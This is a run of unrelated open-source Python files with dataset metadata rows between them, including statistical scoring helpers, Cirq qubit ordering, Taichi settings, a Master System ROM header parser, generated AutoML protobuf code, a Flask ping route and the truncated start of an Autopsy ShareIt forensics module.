    def __init__(self, model, kwargs):
        # Keep the model class and its constructor kwargs; a fresh
        # estimator is built on every corr() call.
        self.model = model
        self.kwargs = kwargs

    def corr(self, x, y):
        """Fit self.model on x (as a single column) and return the Pearson
        correlation between the fitted predictions and y."""
        estimator = self.model(**self.kwargs)
        feature = x.reshape(-1, 1)
        estimator.fit(X=feature, y=y)
        predicted = estimator.predict(X=feature)
        return pearson(x=predicted, y=y)
def granger(x, y, n_lags=4):
    """Granger-style causality score of x on y via lagged OLS with
    backward elimination.

    Builds ``n_lags`` lagged columns of both x and y, regresses y on them,
    then repeatedly drops the regressor with the largest t-test p-value
    until no x-lag columns remain. At each step the smallest of the
    per-coefficient t-test p-values and the overall F-test p-value is
    recorded; the result is 1 minus the smallest recorded p-value, so
    larger values indicate a more significant relationship at some step.

    NOTE(review): assumes x and y are 1-D numpy arrays of equal length
    strictly greater than n_lags — TODO confirm against callers.
    """
    recorded = []
    X, Y = [], []
    for j in range(n_lags):
        # Column j holds values lagged by (n_lags - j) steps relative to
        # the target y_ below (both slices have length len(x) - n_lags).
        X.append(x[j:-n_lags + j].reshape(-1, 1))
        Y.append(y[j:-n_lags + j].reshape(-1, 1))
    # Target: y with the first n_lags observations dropped.
    y_ = y[n_lags:]
    done = False
    # Boolean masks select which lag columns are still in the model;
    # the code arrays map positions-within-the-mask back to lag indices.
    x_mask = [True] * n_lags
    x_codes = numpy.array(list(range(n_lags)))
    y_mask = [True] * n_lags
    y_codes = numpy.array(list(range(n_lags)))
    while not done:
        # build an ols model
        Z = numpy.concatenate(X + Y, axis=1)[:, x_mask + y_mask]
        model = LinearRegression()
        model.fit(X=Z, y=y_)
        # params[0] is the intercept; params[1:] are the lag coefficients.
        params = numpy.append(model.intercept_, model.coef_)
        predictions = model.predict(Z)
        # t-testing
        Z_extended = numpy.append(numpy.ones(shape=(Z.shape[0], 1)), Z, axis=1)
        # Residual mean square with (n - p) degrees of freedom, where p
        # counts the added intercept column as well.
        mse = ((y_ - predictions) ** 2).sum() / (Z_extended.shape[0] - Z_extended.shape[1])
        params_variance = mse * (numpy.linalg.inv(numpy.dot(Z_extended.T, Z_extended)).diagonal())
        params_std = numpy.sqrt(params_variance)
        params_standardized = params / params_std
        # Two-sided p-values from the t distribution.
        t_test_p_values = [2 * (1 - stats.t.cdf(numpy.abs(ps), (Z_extended.shape[0] - Z_extended.shape[1])))
                           for ps in params_standardized]
        # f-testing
        r_squared = model.score(X=Z, y=y_)
        n = Z.shape[0]
        k = Z.shape[1] + 1
        f_statistic_value = (r_squared / (1 - r_squared)) * ((n - k - 1) / k)
        f_test_p_values = 1 - stats.f(k - 1, n - k).cdf(f_statistic_value)
        recorded.append(numpy.min([f_test_p_values] + t_test_p_values))
        # Backward elimination: drop the coefficient with the LARGEST
        # (least significant) t-test p-value.
        # NOTE(review): t_test_p_values[0] belongs to the intercept (params
        # starts with intercept_), yet the argmax index is applied directly
        # to the x/y lag masks below — this looks like an off-by-one that
        # can eliminate the wrong column; confirm intended behavior.
        t_test_p_values_max = numpy.array(t_test_p_values).argmax()
        if t_test_p_values_max < numpy.array(x_mask).sum():
            x_mask[x_codes[x_mask][t_test_p_values_max]] = False
        else:
            y_mask[y_codes[y_mask][t_test_p_values_max - numpy.array(x_mask).sum()]] = False
        # Stop only once every x lag has been eliminated (y lags may remain).
        if numpy.array(x_mask).sum() == 0:
            done = True
    min_result = 1 - numpy.min(recorded)
    return min_result
def mutual(x, y):
    """Estimated mutual information between x (as one feature column) and y."""
    feature_column = x.reshape(-1, 1)
    return mutual_info_regression(X=feature_column, y=y)[0]
def ks(x, y):
    """Similarity score: one minus the two-sample Kolmogorov-Smirnov
    statistic (1.0 when the empirical distributions coincide)."""
    statistic = stats.ks_2samp(data1=x, data2=y)[0]
    return 1 - statistic
def kl(x, y):
    """One minus the KL divergence between density histograms of x and y.

    Each sample is binned over its own range with numpy's default bin
    count, so this compares normalized histogram shapes.
    """
    px, _ = numpy.histogram(x, density=True)
    py, _ = numpy.histogram(y, density=True)
    divergence = stats.entropy(pk=px, qk=py)
    return 1 - divergence
def cross(x, y):
    """Valid-mode cross-correlation of x and y; for equal-length inputs
    this is a single dot product."""
    correlation = numpy.correlate(a=x, v=y)
    return correlation[0]
| 23.98374 | 108 | 0.592203 |
a5048c7aafdab0990735956dcc21d9620f7ff5d6 | 5,665 | py | Python | cirq-core/cirq/ops/qubit_order.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-core/cirq/ops/qubit_order.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-core/cirq/ops/qubit_order.py | peterse/Cirq | 31daa9410a0e1e1ac3da38109aa8ce3a15aed17b | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import (
Any,
Callable,
Iterable,
Optional,
Tuple,
TypeVar,
TYPE_CHECKING,
)
from cirq.ops import raw_types
if TYPE_CHECKING:
from cirq.ops import qubit_order_or_list
TInternalQubit = TypeVar('TInternalQubit')
TExternalQubit = TypeVar('TExternalQubit')
class QubitOrder:
    """Defines the kronecker product order of qubits."""

    def __init__(
        self, explicit_func: Callable[[Iterable[raw_types.Qid]], Tuple[raw_types.Qid, ...]]
    ) -> None:
        # explicit_func maps any iterable of qubits to the ordered tuple
        # used when building the kronecker product.
        self._explicit_func = explicit_func

    DEFAULT = None  # type: QubitOrder
    """A basis that orders qubits in the same way that calling `sorted` does.

    Specifically, qubits are ordered first by their type name and then by
    whatever comparison value qubits of a given type provide (e.g. for LineQubit
    it is the x coordinate of the qubit).
    """

    @staticmethod
    def explicit(
        fixed_qubits: Iterable[raw_types.Qid], fallback: Optional['QubitOrder'] = None
    ) -> 'QubitOrder':
        """A basis that contains exactly the given qubits in the given order.

        Args:
            fixed_qubits: The qubits in basis order.
            fallback: A fallback order to use for extra qubits not in the
                fixed_qubits list. Extra qubits will always come after the
                fixed_qubits, but will be ordered based on the fallback. If no
                fallback is specified, a ValueError is raised when extra qubits
                are specified.

        Returns:
            A Basis instance that forces the given qubits in the given order.

        Raises:
            ValueError: If a qubit appears in `fixed_qubits` more than once,
                or (raised later, from `order_for`) if extra qubits are
                encountered and no fallback order was provided.
        """
        result = tuple(fixed_qubits)
        if len(set(result)) < len(result):
            raise ValueError(f'Qubits appear in fixed_order twice: {result}.')

        def func(qubits):
            remaining = set(qubits) - set(result)
            if not remaining:
                return result
            if not fallback:
                raise ValueError(f'Unexpected extra qubits: {remaining}.')
            return result + fallback.order_for(remaining)

        return QubitOrder(func)

    @staticmethod
    def sorted_by(key: Callable[[raw_types.Qid], Any]) -> 'QubitOrder':
        """A basis that orders qubits ascending based on a key function.

        Args:
            key: A function that takes a qubit and returns a key value. The
                basis will be ordered ascending according to these key values.

        Returns:
            A basis that orders qubits ascending based on a key function.
        """
        return QubitOrder(lambda qubits: tuple(sorted(qubits, key=key)))

    def order_for(self, qubits: Iterable[raw_types.Qid]) -> Tuple[raw_types.Qid, ...]:
        """Returns a qubit tuple ordered corresponding to the basis.

        Args:
            qubits: Qubits that should be included in the basis. (Additional
                qubits may be added into the output by the basis.)

        Returns:
            A tuple of qubits in the same order that their single-qubit
            matrices would be passed into `np.kron` when producing a matrix for
            the entire system.
        """
        return self._explicit_func(qubits)

    @staticmethod
    def as_qubit_order(val: 'qubit_order_or_list.QubitOrderOrList') -> 'QubitOrder':
        """Converts a value into a basis.

        Args:
            val: An iterable or a basis.

        Returns:
            The basis implied by the value.

        Raises:
            ValueError: If `val` is neither an iterable of qubits nor a
                `QubitOrder`.
        """
        if isinstance(val, Iterable):
            return QubitOrder.explicit(val)
        if isinstance(val, QubitOrder):
            return val
        raise ValueError(f"Don't know how to interpret <{val}> as a Basis.")

    def map(
        self,
        internalize: Callable[[TExternalQubit], TInternalQubit],
        externalize: Callable[[TInternalQubit], TExternalQubit],
    ) -> 'QubitOrder':
        """Transforms the Basis so that it applies to wrapped qubits.

        Args:
            externalize: Converts an internal qubit understood by the underlying
                basis into an external qubit understood by the caller.
            internalize: Converts an external qubit understood by the caller
                into an internal qubit understood by the underlying basis.

        Returns:
            A basis that transforms qubits understood by the caller into qubits
            understood by an underlying basis, uses that to order the qubits,
            then wraps the ordered qubits back up for the caller.
        """

        def func(qubits):
            unwrapped_qubits = [internalize(q) for q in qubits]
            unwrapped_result = self.order_for(unwrapped_qubits)
            return tuple(externalize(q) for q in unwrapped_result)

        return QubitOrder(func)
QubitOrder.DEFAULT = QubitOrder.sorted_by(lambda v: v)
| 35.186335 | 91 | 0.649956 |
7e34817590fa794140696edba14e330853fbe0d4 | 2,660 | py | Python | python/taichi/core/settings.py | 447983454/taichi | 2bfbca88b2d8cb1a070da9a40c5422c99b23fc2f | [
"MIT"
] | 2 | 2020-10-22T14:57:47.000Z | 2020-10-24T07:30:47.000Z | python/taichi/core/settings.py | SingleFYD/taichi | cdff76dd529e7c1a41b219b44712f0ab0584277a | [
"MIT"
] | 3 | 2020-08-24T09:07:15.000Z | 2020-08-24T09:18:29.000Z | python/taichi/core/settings.py | SingleFYD/taichi | cdff76dd529e7c1a41b219b44712f0ab0584277a | [
"MIT"
] | 1 | 2020-09-29T17:56:48.000Z | 2020-09-29T17:56:48.000Z | import os
import platform
import multiprocessing
# Fallback thread count used when TAICHI_NUM_THREADS is not set.
default_num_threads = multiprocessing.cpu_count()


def get_num_cores():
    """Return the number of worker threads to use, as an int.

    Honors the TAICHI_NUM_THREADS environment variable, falling back to the
    machine's CPU count. The int() cast fixes an inconsistency where the raw
    environment value (a string) previously leaked through unconverted.
    """
    return int(os.environ.get('TAICHI_NUM_THREADS', default_num_threads))
def get_os_name():
    """Map platform.platform() to a short OS tag: 'osx', 'win', or 'linux'.

    Raises:
        AssertionError: If the platform string is not recognized.
    """
    name = platform.platform()
    # in python 3.8, platform.platform() uses mac_ver() on macOS
    # it will return 'macOS-XXXX' instead of 'Darwin-XXXX'
    lowered = name.lower()
    if lowered.startswith(('darwin', 'macos')):
        return 'osx'
    elif lowered.startswith('windows'):
        return 'win'
    elif lowered.startswith('linux'):
        return 'linux'
    # Raise explicitly: a bare `assert False` is stripped under `python -O`,
    # which would silently return None here.
    raise AssertionError("Unknown platform name %s" % name)
def get_directory(dir):
    """Resolve a '/'-separated relative path under the repo directory."""
    segments = dir.split('/')
    return os.path.join(get_repo_directory(), *segments)
def get_repo_directory():
    """Return the Taichi repo directory.

    Uses the TAICHI_REPO_DIR environment variable when set; otherwise
    defaults to ~/.taichi.

    Raises:
        ValueError: If the resolved directory does not exist.
    """
    repo_dir = os.environ.get('TAICHI_REPO_DIR')
    if repo_dir is None:
        # os.path.expanduser resolves the home directory even when HOME is
        # unset (e.g. on Windows), whereas os.environ.get('HOME') returns
        # None there and crashes os.path.join.
        repo_dir = os.path.join(os.path.expanduser('~'), ".taichi")
    if not os.path.exists(repo_dir):
        raise ValueError(f"TAICHI_REPO_DIR [{repo_dir}] does not exist.")
    return repo_dir
def get_project_directory(project=None):
    """Path of the projects root, or of a named project inside it."""
    projects_root = os.path.join(get_repo_directory(), 'projects')
    if not project:
        return projects_root
    return os.path.join(projects_root, project)
def get_runtime_directory():
    """Directory of runtime libraries (external/lib under the repo),
    overridable via TAICHI_BIN_DIR."""
    default = os.path.join(get_repo_directory(), 'external', 'lib')
    return os.environ.get('TAICHI_BIN_DIR', default)
def get_build_directory():
    """Directory of build outputs (build/ under the repo), overridable via
    TAICHI_BIN_DIR."""
    default = os.path.join(get_repo_directory(), 'build')
    return os.environ.get('TAICHI_BIN_DIR', default)
def get_bin_directory():
    """Directory of binaries: 'runtimes' on Windows (where the DLLs live),
    'build' elsewhere."""
    subdir = 'runtimes' if get_os_name() == 'win' else 'build'
    return os.path.join(get_repo_directory(), subdir)
def get_output_directory():
    """Directory for outputs (outputs/ under the repo), overridable via
    TAICHI_OUTPUT_DIR."""
    default = os.path.join(get_repo_directory(), 'outputs')
    return os.environ.get('TAICHI_OUTPUT_DIR', default)
def get_output_path(path, create=False):
    """Resolve `path` inside the output directory, optionally creating it."""
    full_path = os.path.join(get_output_directory(), path)
    if create:
        os.makedirs(full_path, exist_ok=True)
    return full_path
def get_asset_directory():
    """Asset directory: TAICHI_ASSET_DIR if non-blank, else assets/ in the repo."""
    configured = os.environ.get('TAICHI_ASSET_DIR', '').strip()
    if configured:
        return configured
    return os.path.join(get_repo_directory(), 'assets')
def get_asset_path(path, *args):
    """Join `path` (and any extra segments) under the asset directory."""
    parts = (get_asset_directory(), path) + args
    return os.path.join(*parts)
# Public names exported on star-import. Note this is a curated subset:
# helpers such as get_num_cores(), get_directory(), get_project_directory()
# and the output/asset path utilities are not (currently) listed here.
__all__ = [
    'get_output_directory',
    'get_build_directory',
    'get_bin_directory',
    'get_repo_directory',
    'get_runtime_directory',
    'get_os_name',
]
| 26.868687 | 77 | 0.658647 |
ae72a700f8ebd6fa862d53db0f000af609980bcc | 7,367 | py | Python | models/pyrominfo/mastersystem.py | tiradoe/dgen-gtk | 6de074f1777dfb2acc1d5c9becbcdec244a85c59 | [
"MIT"
] | null | null | null | models/pyrominfo/mastersystem.py | tiradoe/dgen-gtk | 6de074f1777dfb2acc1d5c9becbcdec244a85c59 | [
"MIT"
] | 1 | 2019-03-21T06:07:00.000Z | 2019-03-21T06:07:00.000Z | models/pyrominfo/mastersystem.py | tiradoe/dgen-gtk | 6de074f1777dfb2acc1d5c9becbcdec244a85c59 | [
"MIT"
] | null | null | null | # Copyright (C) 2013 Garrett Brown
# See Copyright Notice in rominfo.py
from .rominfo import RomInfoParser
class MasterSystemParser(RomInfoParser):
    """
    Parse a Sega Master System image. Valid extensions are sms, gg, sg (SG-1000 ROMs).
    TODO: Should we support SG-1000 ROMs?
    Sega Master System header references and related source code:
    * http://www.smspower.org/Development/ROMHeader
    * http://www.smspower.org/Development/SDSCHeader
    """

    def getValidExtensions(self):
        """File extensions this parser accepts (lowercase, without the dot)."""
        return ["sms", "gg", "sg"]

    def parse(self, filename):
        """Read the ROM file and return a dict of header properties.

        Returns an empty dict when the file is too small to contain even the
        lowest possible header location (0x1FF0 plus 16 bytes, i.e. 0x2000).
        """
        props = {}
        with open(filename, "rb") as f:
            data = bytearray(f.read())
            # First header check is at 0x1FF0, so we clearly need at least this much data
            if len(data) >= 0x2000:
                props = self.parseBuffer(data)
        return props

    def isValidData(self, data):
        """
        Sniff out Master System ROM header. Note that some ROMs may use
        custom text. Gensis Plus GX looks at addresses 0x1FF0, 0x3FF0, 0x7FF0.
        Quite a few ROMs, including "Strider (UE) [!].sms", use address 0x81F0.
        X-MAME 0.106 has code to check this address, but the code is commented out...
        https://code.oregonstate.edu/svn/dsp_bd/uclinux-dist/trunk/user/games/xmame/xmame-0.106/mess/machine/sms.c
        The SDSC tag was introduced in 2001 to provide a standard way to tag
        homebrew software. This tag is used as a fallback test if TMR SEGA isn't
        found.
        """
        if any(data[offset : offset + 8] == b"TMR SEGA" for offset in [0x1ff0, 0x3ff0, 0x7ff0, 0x81f0]):
            return True
        if data[0x7fe0 : 0x7fe0 + 4] == b"SDSC":
            return True
        return False

    def parseBuffer(self, data):
        """Extract header properties from an in-memory ROM image.

        Populates header_id, reserved_word, checksum, checksum_ascii, code,
        version, console, region and rom_size from the SMS header, plus
        date, author, title and description from an optional SDSC homebrew
        header (empty strings when absent).
        """
        props = {}

        # Find Master System header offset (see isValidData(), default to 0x7FF0)
        offset = 0x7ff0
        for off in 0x1ff0, 0x3ff0, 0x81f0:
            if data[off : off + 8] == b"TMR SEGA":
                offset = off
                break
        header = data[offset : offset + 0x10] # Only need 0x10 (16) bytes
        if not header:
            return props

        # 7FF0-7FF7 - Magic word "TMR SEGA". Sometimes, this is customized as a "signature"
        #             along with the reserved space and checksum (thus invalidating the
        #             checksum). No names-in-headers lookup tables are maintained here,
        #             but the information from the header_id, reserved_word and
        #             checksum_ascii fields can be referenced against data gathered at:
        #             * http://www.smspower.org/Development/NamesInHeaders
        #             * http://www.smspower.org/forums/viewtopic.php?t=2407
        props["header_id"] = self._sanitize(header[ : 8])

        # 7FF8-7FF9 - Reserved space, usually 0x0000, 0xFFFF or 0x2020
        props["reserved_word"] = self._sanitize(header[0x08 : 0x08 + 2])

        # 7FFA-7FFB - Checksum, little endian
        props["checksum"] = "%04X" % (header[0x0a] << 8 | header[0x0b])

        # Also include checksum in ASCII. Some programmers, like Yuji Naka, use the
        # reserved space and checksum as a signature (NAKA), so in this case KA is
        # more convenient than 0x4B41. According to www.smspower.org, these signatures
        # only seem to feature A-Z, 0-9 and /.
        word = self._sanitize(header[0x0a : 0x0a + 2])
        props["checksum_ascii"] = [c for c in word if 'A' <= c and c <= 'Z' or '0' <= c and c <= '9' or c == '/']

        # 7FFC-7FFE.8 - Product code. The first 2 bytes are a Binary Coded Decimal
        #               representation of the last four digits of the product code.
        #               The high 4 bits of the next byte are a hexadecimal representation
        #               of any remaining digits of the product code.
        props["code"] = "%02d%02X%02X" % (header[0x0e] >> 4, header[0x0d], header[0x0c])

        # 7FFE.8 - Version. The low 4 bits give a version number
        props["version"] = "%02X" % (header[0x0e] & 0x0f)

        # 7FFF.8 - Region and system for which the cartridge is intended
        r = (header[0x0f] >> 4)
        props["console"] = "Sega Master System" if r in [3, 4] else "Game Gear" if r in [5, 6, 7] else ""
        props["region"] = "Japan" if r in [3, 5] else "Export" if r in [4, 6] else "International" if r == 7 else ""

        # 7FFF.8 - ROM size. Final 4 bits give the ROM size, some values are buggy.
        # It is common for this value to be present even when the checksum is not.
        # It is also common for it to indicate a ROM size smaller than the actual ROM
        # size, perhaps to speed up the boot process by speeding up the checksum validation.
        props["rom_size"] = mastersystem_romsize.get(header[0x0f] & 0x0f, "")

        # SDSC (homebrew) header. See isValidData()
        if data[0x7fe0 : 0x7fe0 + 4] == b"SDSC" and len(data) > 0x7fe0 + 0x10:
            sdsc = data[0x7fe0 : 0x7fe0 + 0x10]

            # 7FE0-7FE3 - Magic word "SDSC", this is used to show that the header is present
            # 7FE4-7FE5 - Version, major-dot-minor in BCD. Thus, 0x1046 is 10.46. Note,
            #             this version tag will override the SMS header tag (probably
            #             as the author intended).
            props["version"] = "%X.%02X" % (sdsc[0x04], sdsc[0x05])

            # 7FE6-7FE9 - Release/compilation date, in day, month, year (little endian, all BCD)
            props["date"] = "%02X%02X-%02X-%02X" % (sdsc[0x09], sdsc[0x08], sdsc[0x07], sdsc[0x06])

            # NOTE(review): the two pointer fields below are assembled with the
            # lower-addressed byte as the HIGH byte, while the date field above
            # treats its bytes as little-endian — confirm the intended byte
            # order against the SDSC header specification.

            # 7FEA-7FEB - Author pointer, the ROM address of a zero-terminated
            #             author name. 0xFFFF and 0x0000 indicate no author name.
            props["author"] = self.get_cstr(sdsc[0x0a] << 8 | sdsc[0x0b], data)

            # 7FEC-7FED - Name pointer, the ROM address of a zero-terminated program
            #             name. 0xFFFF indicates no program name (but I ignore 0 also).
            props["title"] = self.get_cstr(sdsc[0x0c] << 8 | sdsc[0x0d], data)

            # 7FEE-7FEF - Description pointer, the ROM address of a zero-terminated
            #             description. 0xFFFF indicates no program name (but I ignore
            #             0x0000 also). Can include CR, CRLF and LF line breaks.
            props["description"] = self.get_cstr(sdsc[0x0e] << 8 | sdsc[0x0f], data)
        else:
            # No update to version property
            props["date"] = ""
            props["author"] = ""
            props["title"] = ""
            props["description"] = ""

        return props

    def get_cstr(self, ptr, data):
        """
        Parse a zero-terminated (c-style) string from a bytearray. 0xFFFF and
        0x0000 are invalid ptr values and will return "".
        """
        if ptr != 0xffff and ptr != 0 and ptr < len(data):
            term = ptr
            while term < len(data) and data[term]:
                term += 1
            return self._sanitize(data[ptr : term])
        return ""
# Register a singleton instance with the shared RomInfoParser registry.
RomInfoParser.registerParser(MasterSystemParser())

# ROM-size nibble (header byte 0x0F, low 4 bits) -> human-readable size.
# Values 0xA-0xF cover the small sizes; 0x0-0x2 wrap around to the large ones.
mastersystem_romsize = {
    0xa: "8 KB",
    0xb: "16 KB",
    0xc: "32 KB",
    0xd: "48 KB",
    0xe: "64 KB",
    0xf: "128 KB",
    0x0: "256 KB",
    0x1: "512 KB",
    0x2: "1024 KB",
}
828b2e9c74b31ec0e739163d1f6cad6f23cb669c | 5,596 | py | Python | google/cloud/automl_v1/proto/annotation_spec_pb2.py | busunkim96/python-automl | 7df905910b86721a6ee3a3b6c916a4f8e27d0aa7 | [
"Apache-2.0"
] | null | null | null | google/cloud/automl_v1/proto/annotation_spec_pb2.py | busunkim96/python-automl | 7df905910b86721a6ee3a3b6c916a4f8e27d0aa7 | [
"Apache-2.0"
] | null | null | null | google/cloud/automl_v1/proto/annotation_spec_pb2.py | busunkim96/python-automl | 7df905910b86721a6ee3a3b6c916a4f8e27d0aa7 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/automl_v1/proto/annotation_spec.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/automl_v1/proto/annotation_spec.proto",
package="google.cloud.automl.v1",
syntax="proto3",
serialized_options=b"\n\032com.google.cloud.automl.v1P\001Z<google.golang.org/genproto/googleapis/cloud/automl/v1;automl\252\002\026Google.Cloud.AutoML.V1\312\002\026Google\\Cloud\\AutoMl\\V1\352\002\031Google::Cloud::AutoML::V1",
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n2google/cloud/automl_v1/proto/annotation_spec.proto\x12\x16google.cloud.automl.v1\x1a\x19google/api/resource.proto\x1a\x1cgoogle/api/annotations.proto"\xd6\x01\n\x0e\x41nnotationSpec\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x14\n\x0c\x64isplay_name\x18\x02 \x01(\t\x12\x15\n\rexample_count\x18\t \x01(\x05:\x88\x01\xea\x41\x84\x01\n$automl.googleapis.com/AnnotationSpec\x12\\projects/{project}/locations/{location}/datasets/{dataset}/annotationSpecs/{annotation_spec}B\xaa\x01\n\x1a\x63om.google.cloud.automl.v1P\x01Z<google.golang.org/genproto/googleapis/cloud/automl/v1;automl\xaa\x02\x16Google.Cloud.AutoML.V1\xca\x02\x16Google\\Cloud\\AutoMl\\V1\xea\x02\x19Google::Cloud::AutoML::V1b\x06proto3',
dependencies=[
google_dot_api_dot_resource__pb2.DESCRIPTOR,
google_dot_api_dot_annotations__pb2.DESCRIPTOR,
],
)
_ANNOTATIONSPEC = _descriptor.Descriptor(
name="AnnotationSpec",
full_name="google.cloud.automl.v1.AnnotationSpec",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.cloud.automl.v1.AnnotationSpec.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="display_name",
full_name="google.cloud.automl.v1.AnnotationSpec.display_name",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="example_count",
full_name="google.cloud.automl.v1.AnnotationSpec.example_count",
index=2,
number=9,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=b"\352A\204\001\n$automl.googleapis.com/AnnotationSpec\022\\projects/{project}/locations/{location}/datasets/{dataset}/annotationSpecs/{annotation_spec}",
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=136,
serialized_end=350,
)
DESCRIPTOR.message_types_by_name["AnnotationSpec"] = _ANNOTATIONSPEC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AnnotationSpec = _reflection.GeneratedProtocolMessageType(
"AnnotationSpec",
(_message.Message,),
{
"DESCRIPTOR": _ANNOTATIONSPEC,
"__module__": "google.cloud.automl_v1.proto.annotation_spec_pb2",
"__doc__": """A definition of an annotation spec.
Attributes:
name:
Output only. Resource name of the annotation spec. Form: ‘pro
jects/{project_id}/locations/{location_id}/datasets/{dataset_i
d}/annotationSpecs/{annotation_spec_id}’
display_name:
Required. The name of the annotation spec to show in the
interface. The name can be up to 32 characters long and must
match the regexp ``[a-zA-Z0-9_]+``.
example_count:
Output only. The number of examples in the parent dataset
labeled by the annotation spec.
""",
# @@protoc_insertion_point(class_scope:google.cloud.automl.v1.AnnotationSpec)
},
)
_sym_db.RegisterMessage(AnnotationSpec)
DESCRIPTOR._options = None
_ANNOTATIONSPEC._options = None
# @@protoc_insertion_point(module_scope)
| 38.861111 | 718 | 0.678163 |
c1f47baa064b6b6582412411fb8b0a59bcab3827 | 176 | py | Python | api/api.py | JaniniRami/Flask-Blueprint-Template | 4c09716890ae1eb6bb5afcd2800a702300fd5bac | [
"MIT"
] | null | null | null | api/api.py | JaniniRami/Flask-Blueprint-Template | 4c09716890ae1eb6bb5afcd2800a702300fd5bac | [
"MIT"
] | null | null | null | api/api.py | JaniniRami/Flask-Blueprint-Template | 4c09716890ae1eb6bb5afcd2800a702300fd5bac | [
"MIT"
] | null | null | null | from flask import Blueprint
from flask import jsonify
api = Blueprint('api', __name__)
@api.route('/api/ping')
def ping():
return jsonify({'response' : 'pong!'})
| 19.555556 | 43 | 0.659091 |
dc9c549f23c0cf57d67018fc2db7425c76bf3236 | 7,069 | py | Python | InternalPythonModules/android/shareit.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 13 | 2020-11-16T12:30:48.000Z | 2021-02-10T15:00:14.000Z | InternalPythonModules/android/shareit.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 1 | 2019-12-05T14:10:20.000Z | 2019-12-05T14:10:20.000Z | InternalPythonModules/android/shareit.py | ljmf00/autopsy | 34a980b7fc7ea47287e7101f5bba6cb1b518bc7b | [
"Apache-2.0"
] | 5 | 2019-10-08T04:48:19.000Z | 2019-11-22T04:29:12.000Z | """
Autopsy Forensic Browser
Copyright 2019-2020 Basis Technology Corp.
Contact: carrier <at> sleuthkit <dot> org
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from java.io import File
from java.lang import Class
from java.lang import ClassNotFoundException
from java.lang import Long
from java.lang import String
from java.sql import ResultSet
from java.sql import SQLException
from java.sql import Statement
from java.util.logging import Level
from java.util import ArrayList
from org.apache.commons.codec.binary import Base64
from org.sleuthkit.autopsy.casemodule import Case
from org.sleuthkit.autopsy.casemodule import NoCurrentCaseException
from org.sleuthkit.autopsy.coreutils import Logger
from org.sleuthkit.autopsy.coreutils import MessageNotifyUtil
from org.sleuthkit.autopsy.coreutils import AppSQLiteDB
from org.sleuthkit.autopsy.datamodel import ContentUtils
from org.sleuthkit.autopsy.ingest import IngestJobContext
from org.sleuthkit.datamodel import AbstractFile
from org.sleuthkit.datamodel import BlackboardArtifact
from org.sleuthkit.datamodel import BlackboardAttribute
from org.sleuthkit.datamodel import Content
from org.sleuthkit.datamodel import TskCoreException
from org.sleuthkit.datamodel.Blackboard import BlackboardException
from org.sleuthkit.datamodel import Account
from org.sleuthkit.datamodel.blackboardutils import CommunicationArtifactsHelper
from org.sleuthkit.datamodel.blackboardutils.attributes import MessageAttachments
from org.sleuthkit.datamodel.blackboardutils.attributes.MessageAttachments import FileAttachment
from org.sleuthkit.datamodel.blackboardutils.CommunicationArtifactsHelper import MessageReadStatus
from org.sleuthkit.datamodel.blackboardutils.CommunicationArtifactsHelper import CommunicationDirection
import traceback
import general
"""
Finds the SQLite DB for ShareIt, parses the DB for contacts & messages,
and adds artifacts to the case.
"""
class ShareItAnalyzer(general.AndroidComponentAnalyzer):
    """
    ShareIt is a file transfer utility app.
    This module finds the SQLite DB for ShareIt, parses the DB for contacts & messages,
    and adds artifacts to the case.
    ShareIt version 5.0.28 has the following database structure:
        - history.db
            -- A history table, with records of file transfers
            -- An item table with details of the files transferred
